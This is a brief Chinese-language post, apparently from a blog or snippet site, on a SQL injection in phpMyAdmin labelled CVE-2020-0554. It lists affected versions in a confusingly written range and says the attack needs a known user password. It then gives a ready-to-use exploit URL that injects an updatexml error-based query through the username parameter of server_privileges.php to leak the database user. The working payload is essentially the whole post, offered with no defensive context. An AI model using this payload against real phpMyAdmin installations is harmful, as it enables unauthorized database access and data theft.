phpMyadmin SQL注入(CVE-2020-0554)

影响版本: 4<4.9.4 and 5>5.0.1

前提:已知phpMyadmin的一个用户口令

Payload:

/phpMyAdmin-4.9.2-all-languages/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20

你可能感兴趣的:(phpMyadmin SQL注入(CVE-2020-0554))